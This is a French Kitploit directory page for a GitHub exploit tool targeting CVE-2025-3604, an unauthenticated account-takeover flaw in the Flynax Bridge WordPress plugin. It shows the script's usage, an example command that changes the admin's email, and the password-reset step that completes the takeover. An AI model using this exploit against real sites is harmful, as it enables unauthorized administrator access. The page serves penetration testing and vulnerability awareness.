Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3604 — Flynax Bridge <= 2.2.0 - Escalade de privilèges non authentifiée via la prise de contrôle de compte | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-3604
Authentification et AutorisationEscalade de PrivilègesAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-3604

CVE-2025-3604

Flynax Bridge <= 2.2.0 - Escalade de privilèges non authentifiée via la prise de contrôle de compte

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 Flynax Bridge <= 2.2.0 - Escalade de privilèges non authentifiée via la prise de contrôle du compte

📄 Description

Le plugin Flynax Bridge pour WordPress est vulnérable à l'escalade de privilèges via la prise de contrôle du compte dans toutes les versions jusqu'à 2.2.0 incluse.

Cela est dû au fait que le plugin ne valide pas correctement l'identité d'un utilisateur avant de mettre à jour ses informations de compte (comme l'e-mail). En conséquence, des attaquants non authentifiés peuvent modifier l'adresse e-mail de n'importe quel utilisateur, y compris les administrateurs, puis initier une réinitialisation du mot de passe pour prendre complètement le contrôle du compte.

CVE: CVE-2025-3604
CVSS: 9.8 (Critique)
Publié: 23 avril 2025
Dernière mise à jour: 24 avril 2025


⚙️ Exemple de sortie du script

root@kitploit:~
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited

Après une exploitation réussie, l'attaquant peut se rendre sur la page de connexion WordPress et cliquer sur "Mot de passe perdu ?" en utilisant le nouvel e-mail défini pour réinitialiser le mot de passe et obtenir un accès complet au compte ciblé.


🚀 Utilisation

root@kitploit:~
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit

🧪 Exemple

root@kitploit:~
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"

Explication:

  • -u: URL de base du site WordPress.
  • -id: ID de l'utilisateur à cibler (généralement 1 pour l'admin).
  • -mail: Nouvel e-mail qui sera défini pour cet utilisateur.

⚠️ Avertissement

À utiliser à vos risques et périls. Uniquement à des fins de tests autorisés et éducatifs.

🧑‍💻

PAR : Nxploited ( Khaled_alenazi )

Télécharger l’outil